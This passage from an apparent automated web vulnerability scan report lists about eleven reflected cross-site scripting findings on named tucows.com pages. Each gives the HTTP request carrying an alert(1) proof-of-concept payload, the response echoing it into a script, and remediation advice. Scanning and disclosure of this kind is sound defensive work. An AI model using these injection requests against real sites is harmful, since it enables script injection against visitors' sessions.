1.327. http://www.tucows.com/images/newassets/safesearchtoggle.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/safesearchtoggle.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 60f39"-alert(1)-"f5b143ebb35 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images60f39"-alert(1)-"f5b143ebb35/newassets/safesearchtoggle.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:27:25 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images60f39"-alert(1)-"f5b143ebb35/newassets/safesearchtoggle.html";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.328. http://www.tucows.com/images/newassets/safesearchtoggle.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/safesearchtoggle.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7ffc5"-alert(1)-"d8706d26674 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets7ffc5"-alert(1)-"d8706d26674/safesearchtoggle.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:27:35 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets7ffc5"-alert(1)-"d8706d26674/safesearchtoggle.html";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.329. http://www.tucows.com/images/newassets/safesearchtoggle.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/safesearchtoggle.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e60fe"-alert(1)-"be3796b76d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/safesearchtoggle.htmle60fe"-alert(1)-"be3796b76d HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:27:44 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/safesearchtoggle.htmle60fe"-alert(1)-"be3796b76d";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.330. http://www.tucows.com/images/newassets/safesearchtoggle.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/safesearchtoggle.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d3b77"-alert(1)-"99a3ca1e499 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/safesearchtoggle.html?d3b77"-alert(1)-"99a3ca1e499=1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:59 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/safesearchtoggle.html?d3b77"-alert(1)-"99a3ca1e499=1";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.331. http://www.tucows.com/images/newassets/search.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/search.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a7005"-alert(1)-"da1cff69e08 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imagesa7005"-alert(1)-"da1cff69e08/newassets/search.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:28:37 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/imagesa7005"-alert(1)-"da1cff69e08/newassets/search.html";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.332. http://www.tucows.com/images/newassets/search.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/search.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6080c"-alert(1)-"416c9945040 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets6080c"-alert(1)-"416c9945040/search.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:28:53 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets6080c"-alert(1)-"416c9945040/search.html";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.333. http://www.tucows.com/images/newassets/search.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/search.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 86474"-alert(1)-"fc2d258ee4e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/search.html86474"-alert(1)-"fc2d258ee4e HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:29:07 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/search.html86474"-alert(1)-"fc2d258ee4e";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.334. http://www.tucows.com/images/newassets/search.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/search.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e494d"-alert(1)-"4b77aa9c219 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/search.html?e494d"-alert(1)-"4b77aa9c219=1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:28:07 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/search.html?e494d"-alert(1)-"4b77aa9c219=1";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.335. http://www.tucows.com/images/newassets/sitemap.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/sitemap.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload af8d9"-alert(1)-"92a1570dd92 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imagesaf8d9"-alert(1)-"92a1570dd92/newassets/sitemap.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:27:55 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/imagesaf8d9"-alert(1)-"92a1570dd92/newassets/sitemap.html";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.336. http://www.tucows.com/images/newassets/sitemap.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/sitemap.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82496"-alert(1)-"c8a91aceec7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets82496"-alert(1)-"c8a91aceec7/sitemap.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:28:13 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets82496"-alert(1)-"c8a91aceec7/sitemap.html";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.337. http://www.tucows.com/images/newassets/sitemap.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/sitemap.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload caf6a"-alert(1)-"44f43ba9b50 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/sitemap.htmlcaf6a"-alert(1)-"44f43ba9b50 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:28:25 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
